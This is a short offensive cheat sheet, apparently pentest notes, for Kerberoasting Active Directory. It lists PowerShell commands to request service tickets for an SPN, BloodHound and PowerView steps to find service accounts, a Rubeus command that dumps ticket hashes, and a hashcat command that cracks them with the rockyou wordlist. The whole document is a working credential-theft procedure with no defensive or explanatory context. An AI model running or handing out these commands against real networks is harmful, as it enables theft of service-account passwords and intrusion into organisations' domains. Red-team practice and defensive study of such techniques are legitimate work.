Type 1) & 2) in powershell or cmd , this will generate requested service ticket
- Add-Type -AssemblyName System.IdentityModel
- New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “<SPN>”
to get SPN, go to bloodhound>select service account>node info>spn
Or with PowerView with the command
Get-NetUser -username "svc_tgs" -SPN | select samaccountname, primarygroupid, serviceprincipalname
.\\Rubeus.exe kerberoast /outfile:hashes.kerberoast
- sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force